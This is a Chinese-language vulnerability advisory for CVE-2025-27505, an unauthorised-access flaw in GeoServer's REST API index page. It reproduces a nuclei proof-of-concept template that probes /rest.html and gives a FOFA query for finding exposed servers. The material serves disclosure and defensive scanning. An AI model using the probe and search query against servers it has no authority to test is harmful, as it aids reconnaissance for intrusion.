GeoServer REST API Index 未授权访问漏洞

漏洞信息

漏洞名称： GeoServer REST API Index 未授权访问漏洞

漏洞编号：

• CVE： CVE-2025-27505

漏洞类型： 未授权访问

漏洞等级： 中危

漏洞描述： GeoServer是一个开源的地理信息系统（GIS）服务器，允许用户共享和编辑地理空间数据。它广泛应用于企业级服务和Web应用组件中，支持多种地理空间数据格式和标准。此次发现的漏洞影响了GeoServer的REST API Index页面，存在未授权访问问题。该漏洞的技术根源在于GeoServer的REST API Index页面未正确实施授权检查，导致攻击者无需认证即可访问敏感信息。具体而言，攻击者可以通过发送特定的HTTP请求到受影响的GeoServer实例的REST API Index页面（如/rest.html或/geoserver/rest.html），从而获取关于服务器配置和状态的信息。这种信息泄露可能被攻击者利用来进行进一步的攻击，如配置信息的收集和潜在的安全漏洞的利用。尽管该漏洞的CVSS评分为5.3（中危），但它仍然对依赖GeoServer进行地理空间数据管理的组织构成了安全风险，尤其是在未实施适当网络隔离或访问控制的环境中。

产品厂商： osgeo

产品名称： GeoServer

影响版本： *

搜索语法： app=”GeoServer”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/c586779a3c639440a85f16c1141d835db6a86000/http%2Fcves%2F2025%2FCVE-2025-27505.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-27505

info:
  name: GeoServer - Missing Authorization on REST API Index
  author: securitytaters
  severity: medium
  description: GeoServer has authorization issue on its REST API Index page
  reference:
    - http://geoserver.org/
    - https://geoserver.org/vulnerability/2025/06/10/cve-disclosure.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-27505
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-862
    cpe: cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="GeoServer"
    vendor: osgeo
    product: geoserver
  tags: cve,cve2025,geoserver

http:
  - method: GET
    path:
      - "{{BaseURL}}/rest.html"
      - "{{BaseURL}}/geoserver/rest.html"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Geoserver Configuration API

      - type: word
        part: body
        words:
          - about/status

      - type: status
        status:
          - 200